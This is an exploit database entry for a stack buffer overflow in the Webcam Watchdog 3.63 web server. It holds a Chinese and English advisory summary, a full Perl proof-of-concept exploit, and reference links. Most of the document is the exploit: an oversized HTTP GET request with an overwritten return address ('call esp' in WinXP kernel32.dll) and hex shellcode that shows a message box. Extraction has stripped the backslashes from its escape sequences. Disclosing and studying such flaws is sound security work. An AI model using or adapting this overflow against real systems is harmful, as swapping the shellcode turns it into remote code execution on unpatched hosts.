https://www.exploit-db.com/exploits/23514
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200401-002

WebcamWatchdog是一套功能强大的远端数位监控系统，同时具备网路监控、数码录影以及网络直播功能。WebcamWatchdog包含的web服务程序对超长HTTPGET请求缺少边界检查，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以web进程权限在系统上执行任意指令。提交超过234字符的HTTPGET请求到WebcamWatchdog监听的80端口，可触发缓冲区溢出，精心构建提交数据，可能以Web进程权限在系统上执行任意指令。

source: http://www.securityfocus.com/bid/9351/info

A problem has been identified in the handling of remote web requests by the Webcam Watchdog software. Because of this, it may be possible for a remote attacker to gain unauthorized access to a vulnerable system. 

#!/usr/bin/perl -w
#
# Stack Overflow in Webcam Watchdog - Proof of Concept Exploit
#
# - Tested on version 3.63 - MessageBoxA Shellcode
#
# - By Peter Winter-Smith [[email protected]]

use IO::Socket;

if(!($ARGV[1]))
{
 print "nUsage: wcwdpoc.pl <test_system> <port>n" .
       "tDefault port is 80nn";
 exit;
}

print "nWebcam Watchdog 3.63 Stack Overflow PoCn";


$target = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Unable to connect to $ARGV[0] on port $ARGV[1]";

$shellcode = "x90x90x90x90x90x90x90x90" .
                        "xEBx5Dx5Fx55x89xE5x81xC4" .
                        "xF0xFFxFFxFFx57xFCxB0xFE" .
                        "xF2xAEx80x47xFFx30x5Fx57" .
                        "x31xD2xB9xFFxFFxFFxFFxB2" .
                        "x05xB0xFFxF2xAExFEx47xFF" .
                        "x57xFExCAx80xFAx01x75xF3" .
                        "x81xECxFCxFFxFFxFFx89xE3" .
                        "xFFx73x0CxBExFFxECx59x42" .
                        "xC1xEEx08xFFx16xFFx73x08" .
                        "x50xBExFFxE4x59x42xC1xEE" .
                        "x08xFFx16x31xC9x51xFFx73" .
                        "x04xFFx33x51xFFxD0xCCx90" .
                        "xE8x9DxFFxFFxFFx75x73x65" .
                        "x72x33x32xFEx64x6Cx6CxFF" .
                        "x4Dx65x73x73x61x67x65x42" .
                        "x6Fx78x41xFFx57x61x72x6E" .
                        "x69x6Ex67x21xFFx54x68x69" .
                        "x73x5Fx76x65x72x73x69x6F" .
                        "x6Ex5Fx6Fx66x5Fx57x65x62" .
                        "x63x61x6Dx5Fx57x61x74x63" .
                        "x68x64x6Fx67x5Fx69x73x5F" .
                        "x76x75x6Cx6Ex65x72x61x62" .
                        "x6Cx65x5Fx74x6Fx5Fx72x65" .
                        "x6Dx6Fx74x65x5Fx63x6Fx6D" .
                        "x70x72x6Fx6Dx69x73x65x21" .
                        "xFF";

$ebp = "BBBB";
$eip = "x59xAExE9x77"; # WinXP Home SP1 'kernel32.dll' - 'call esp'

$badpage = "a"x234 . $ebp . $eip . $shellcode;

$request = "GET /" . $badpage. " HTTP/1.1rn" .
           "User-Agent: WCSAXRViewrn" .
           "Host: 127.0.0.1rn" .
           "Cache-Control: no-cachernrn";

print $target $request;

print " + Testing remote systemn + MessageBox should appear if vulnerable!n";

sleep(2);

close($target);

print "Done.n";
exit;

来源:SECUNIA
名称:10527
链接:http://secunia.com/advisories/10527
来源:XF
名称:webcam-watchdog-get-bo(14131)
链接:http://xforce.iss.net/xforce/xfdb/14131
来源:www.webcamsoft.com
链接:http://www.webcamsoft.com/en/watchdog_h.html
来源:BID
名称:9351
链接:http://www.securityfocus.com/bid/9351
来源:BUGTRAQ
名称:20040103WebcamWatchdogStackOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/348818
来源:OSVDB
名称:3312
链接:http://www.osvdb.org/3312
来源:www.elitehaven.net
链接:http://www.elitehaven.net/webcamwatchdog.txt